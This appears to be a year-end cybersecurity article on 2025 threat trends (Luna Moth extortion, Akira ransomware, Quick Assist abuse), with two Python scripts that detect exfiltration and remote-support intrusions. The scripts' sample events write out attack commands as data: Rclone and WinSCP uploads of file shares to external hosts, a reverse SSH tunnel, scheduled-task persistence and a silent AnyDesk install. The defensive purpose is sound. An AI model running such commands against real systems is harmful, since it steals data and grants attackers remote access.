Cybersecurity in 2025: When Defenders Protected Systems—and Attackers Exploited People
- Cyber Jill

As the cybersecurity industry closes the books on 2025, the year is already solidifying around a familiar but unsettling conclusion: attackers didn’t need radically new malware to cause outsized damage. They needed people, timing, and a growing catalog of quietly catastrophic infrastructure flaws.
That’s the throughline emerging from a year-end review by incident response specialists at LevelBlue, which absorbed digital forensics heavyweight Stroz Friedberg earlier this year. Their findings trace a threat landscape increasingly defined by impersonation, abuse of legitimate tools, and the systematic exploitation of network gateways that sit at the heart of modern enterprise connectivity.
Rather than relying on noisy exploits or exotic zero-days alone, 2025’s most active threat actors blended social engineering with reliable access points: VPNs, firewalls, remote support software, and trusted collaboration tools. The result was a year in which defenders often discovered breaches only after data had already walked out the door—or ransomware had detonated deep inside the network.
Social Engineering Grows Teeth
One of the clearest patterns to emerge was the maturation of social engineering from a supporting tactic into the primary access vector. Threat actors increasingly impersonated internal IT staff, abused trusted communication channels, and leveraged legitimate remote access software to move laterally without triggering alarms.
In some cases, attackers went further—recruiting or placing individuals into IT roles inside target organizations, effectively bypassing technical controls altogether. These human-centric intrusions proved especially effective against professional services firms, where responsiveness and trust are operational necessities.
This shift marked a broader evolution: attackers no longer needed to defeat security stacks head-on. They simply convinced users to invite them inside.
Luna Moth and the Rise of Data-First Extortion
Among the most disruptive actors this year was the Luna Moth group, whose campaigns focused less on encryption and more on coercion. Their playbook typically began with phishing messages that appeared to come from internal IT teams, directing victims to call a fake helpdesk.
Once contact was made, attackers persuaded users to install legitimate remote access tools—often Zoho Assist or Atera—then pivoted immediately to data exfiltration using tools like WinSCP or renamed Rclone binaries. Only after sensitive files were in hand did the extortion begin, often through relentless calls and emails designed to apply psychological pressure rather than technical force.
For defenders, the lesson was stark: by the time alerts fired, the damage was already done.
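The exfiltration step above is detectable before the extortion call if telemetry is checked for two things the article implies: a binary whose PE version information still says "rclone.exe" while its on-disk name does not, and transfer tools run by accounts that have no business running them. The following is an added example written for this article, not code from LevelBlue or from the report it summarises. It assumes process-creation records in the shape of Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, User); the sample events, paths, user names and the list of accounts expected to run rclone are all constructed for the example.

```python
import ntpath
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1.
# They are not real telemetry from any incident; paths, users and the
# rclone remote names are invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "User": r"NT AUTHORITY\SYSTEM"},
    # Rclone copied to ProgramData and renamed to svchost.exe; the PE version
    # resource (surfaced by Sysmon as OriginalFileName) still identifies it.
    {"Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'svchost.exe copy "C:\Shares\Legal" mega:backup/legal'
                    r" --config C:\ProgramData\r.conf -q --transfers 20",
     "User": r"CORP\jdoe"},
    # Scripted WinSCP session pushing a share to an external SFTP host.
    {"Image": r"C:\Users\jdoe\AppData\Local\Programs\WinSCP\WinSCP.com",
     "OriginalFileName": "winscp.com",
     "CommandLine": r'WinSCP.com /command "open sftp://upload:pw@203.0.113.10/"'
                    r' "put C:\Shares\Finance\*" "exit"',
     "User": r"CORP\jdoe"},
    # Unmodified rclone run by the account that is expected to run backups.
    {"Image": r"C:\Tools\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe sync D:\Backups corp-s3:backups --config C:\Tools\rclone\rclone.conf",
     "User": r"CORP\svc_backup"},
]

# Accounts expected to run rclone. Assumed for the example; in practice this
# comes from the backup team's inventory, not from a hard-coded set.
EXPECTED_RCLONE_USERS = {r"CORP\svc_backup"}

RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.I)
# rclone addresses remotes as name:path. Requiring a name of two or more
# characters keeps Windows drive letters (C:\) from matching; the lookbehind
# keeps user:pw@ fragments out and the lookahead keeps scheme:// URLs out.
RCLONE_REMOTE = re.compile(r"(?<![\w\\:/])[A-Za-z][\w-]+:(?!//)")
WINSCP_SCRIPTED = re.compile(r"/(?:command|script)\b", re.I)


def classify(event):
    """Return the reasons this process-creation event looks like exfiltration tooling."""
    reasons = []
    name = ntpath.basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    user = event.get("User", "")

    # Strongest signal: the binary's own metadata disagrees with its file name.
    if original == "rclone.exe" and name != "rclone.exe":
        reasons.append("renamed_rclone")

    # Context signal: rclone (by metadata or by command-line shape) run by an
    # account that is not supposed to move data to a remote.
    looks_like_rclone = original == "rclone.exe" or bool(
        RCLONE_VERB.search(cmd) and RCLONE_REMOTE.search(cmd))
    if looks_like_rclone and user not in EXPECTED_RCLONE_USERS:
        reasons.append("rclone_unexpected_user")

    # WinSCP driven by /command or /script is an unattended transfer, not a user clicking around.
    if name in {"winscp.com", "winscp.exe"} and WINSCP_SCRIPTED.search(cmd):
        reasons.append("winscp_scripted_transfer")
    return reasons


def scan(events):
    """Run classify over a batch; return (index, reasons) for every event that fired."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["User"], SAMPLE_EVENTS[i]["Image"], reasons)
```

Run as a script it prints the two flagged events (the renamed Rclone run by an ordinary user and the scripted WinSCP upload) and stays silent on the backup account's legitimate sync, which is the point: the same binary is benign or malicious depending on who runs it and what it is named.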
Akira’s Infrastructure-Driven Momentum
If Luna Moth highlighted the human attack surface, Akira underscored the fragility of perimeter infrastructure. Throughout 2025, Akira affiliates were observed at a higher frequency than nearly any other ransomware group, driven largely by their success exploiting VPN and firewall vulnerabilities.
Two flaws in particular stood out—both affecting SonicWall firewalls. One stemmed from improper access controls introduced during firewall migrations, while another allowed attackers to hijack active VPN sessions outright. In both cases, authentication barriers—including MFA—were rendered irrelevant.
Akira also leaned heavily on SEO poisoning, redirecting users to spoofed download sites hosting trojanized installers for legitimate IT utilities. Once executed, these installers deployed the Bumblebee loader, enabling rapid lateral movement, credential theft, and ultimately ransomware deployment.
The pattern was consistent: a single trusted action—updating a tool, logging into a VPN—could cascade into full-scale compromise.
When Help Desks Become Attack Surfaces
Another notable escalation involved abuse of Microsoft Quick Assist and Teams. Attackers initiated voice calls or Teams messages from compromised external accounts, sometimes preceded by email bombing to create urgency. Victims were then guided to launch Quick Assist and share access—handing attackers the same privileges as the logged-in user.
From there, post-compromise activity followed a disciplined script: reconnaissance, credential harvesting, reverse SSH tunneling, persistence via scheduled tasks and registry changes, and deployment of additional remote access tools like AnyDesk or ScreenConnect. In at least one case, the intrusion culminated in ransomware deployment using PsExec.
Because every tool involved was legitimate, traditional EDR systems often saw nothing more than routine administrative behavior.
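Individually, each step in that script is something an administrator might do. What makes it an intrusion is the sequence: a Quick Assist session, then persistence, a reverse SSH tunnel and a second remote access tool on the same host under the same user within a short window. The correlation below is an added example written for this article, not a detection from LevelBlue or from any EDR product. It assumes process-creation records in the shape of Sysmon Event ID 1 plus a timestamp, host and user; the events, the two-hour window, the two-indicator threshold and the Quick Assist package path (written as QuickAssist_X in place of a real version string) are all constructed for the example.

```python
import ntpath
import re
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1 shape) from two hosts.
# Timestamps, hosts, users, paths and addresses are invented for this example.
SAMPLE_EVENTS = [
    # WS-114: a user launches Quick Assist after a "helpdesk" Teams call ...
    {"ts": "2025-06-03T10:02:11", "host": "WS-114", "user": r"CORP\jdoe",
     "Image": r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_X\QuickAssist.exe",
     "CommandLine": "QuickAssist.exe"},
    # ... and the remote party adds persistence, a reverse SSH tunnel and a second RAT.
    {"ts": "2025-06-03T10:21:40", "host": "WS-114", "user": r"CORP\jdoe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc onlogon /tn "OneDrive Sync" /tr C:\ProgramData\upd.exe /f'},
    {"ts": "2025-06-03T10:24:05", "host": "WS-114", "user": r"CORP\jdoe",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -N -R 2222:localhost:3389 relay@203.0.113.7 -p 443 -o StrictHostKeyChecking=no"},
    {"ts": "2025-06-03T10:31:52", "host": "WS-114", "user": r"CORP\jdoe",
     "Image": r"C:\ProgramData\AnyDesk\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent --start-with-win"},
    # WS-201: a genuine helpdesk session; the only follow-on activity is ordinary.
    {"ts": "2025-06-03T11:10:00", "host": "WS-201", "user": r"CORP\asmith",
     "Image": r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_X\QuickAssist.exe",
     "CommandLine": "QuickAssist.exe"},
    {"ts": "2025-06-03T11:15:30", "host": "WS-201", "user": r"CORP\asmith",
     "Image": r"C:\Windows\System32\control.exe", "CommandLine": "control.exe printers"},
]

# Post-access indicators named in the article, as (category, image basename,
# command-line pattern or None for "any command line").
INDICATORS = [
    ("persistence_schtask", "schtasks.exe", re.compile(r"/create\b", re.I)),
    ("persistence_runkey", "reg.exe", re.compile(r"\badd\b.*\\CurrentVersion\\Run", re.I)),
    ("reverse_ssh_tunnel", "ssh.exe", re.compile(r"(^|\s)-R\s")),   # -R = remote port forward
    ("second_rat", "anydesk.exe", re.compile(r"--install|--start-with-win", re.I)),
    ("second_rat", "screenconnect.clientsetup.exe", None),
    ("remote_exec", "psexec.exe", re.compile(r"\\\\")),             # \\target
]


def categorise(event):
    """Map one event to the first indicator category it matches, or None."""
    name = ntpath.basename(event["Image"]).lower()
    for category, image, pattern in INDICATORS:
        if name == image and (pattern is None or pattern.search(event["CommandLine"])):
            return category
    return None


def correlate(events, window=timedelta(hours=2), min_categories=2):
    """Flag Quick Assist sessions followed, on the same host and user, by at
    least min_categories distinct post-access indicators inside the window."""
    events = sorted(events, key=lambda e: e["ts"])   # ISO-8601 strings sort chronologically
    alerts = []
    for start in events:
        if ntpath.basename(start["Image"]).lower() != "quickassist.exe":
            continue
        t0 = datetime.fromisoformat(start["ts"])
        seen = {}                                     # category -> first command line seen
        for e in events:
            t = datetime.fromisoformat(e["ts"])
            same_context = (e["host"], e["user"]) == (start["host"], start["user"])
            if not same_context or not (t0 < t <= t0 + window):
                continue
            cat = categorise(e)
            if cat and cat not in seen:
                seen[cat] = e["CommandLine"]
        if len(seen) >= min_categories:
            alerts.append({"host": start["host"], "user": start["user"],
                           "session_start": start["ts"], "indicators": seen})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], alert["session_start"], sorted(alert["indicators"]))
```

The rule alerts on WS-114 with three indicator categories and stays quiet on WS-201, where the same Quick Assist launch was followed by nothing of note. Requiring two distinct categories rather than any single indicator is what keeps a legitimate remote support session from paging the on-call analyst every time someone creates a scheduled task; the window and threshold are tuning knobs, not fixed values.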
Vulnerabilities That Defined the Year
While social engineering dominated headlines, infrastructure vulnerabilities remained the accelerant. Firewalls, VPN gateways, and enterprise middleware accounted for a disproportionate share of successful intrusions.
Beyond SonicWall, attackers actively exploited flaws in Fortinet devices, Ivanti Connect Secure VPNs, and SAP NetWeaver—often chaining authentication bypasses with remote code execution to establish persistent control. Several of these bugs enabled full administrative access without credentials, allowing attackers to disable defenses, deploy web shells, and erase forensic evidence.
The common thread: intermediary systems that sit between users and data, often exposed to the internet and patched too slowly to keep pace with exploitation.
Living Off the Land, Living in the Noise
Across nearly every major incident, attackers favored “living off the land” techniques—abusing built-in Windows utilities, standard file transfer tools, and widely used remote support software. By blending into normal IT operations, they reduced their detection footprint while increasing dwell time.
In many environments, the most heavily used attacker tools were indistinguishable from those used by administrators every day.
A Human-Centered Future
As 2026 approaches, the implications are uncomfortable but clear. Phishing emails and zero-days aren’t disappearing—but they’re being eclipsed by impersonation, trust abuse, and behavioral manipulation that bypass technical safeguards entirely.
The defenses that mattered most in 2025 weren’t signature updates or heuristic detections. They were controls that understood context: who should be doing what, when, and why. Without that behavioral awareness, organizations found themselves blind to attackers who never looked like intruders at all.
If 2025 proved anything, it’s that the weakest link in cybersecurity isn’t a single product or patch cycle—it’s the space where humans, tools, and trust intersect.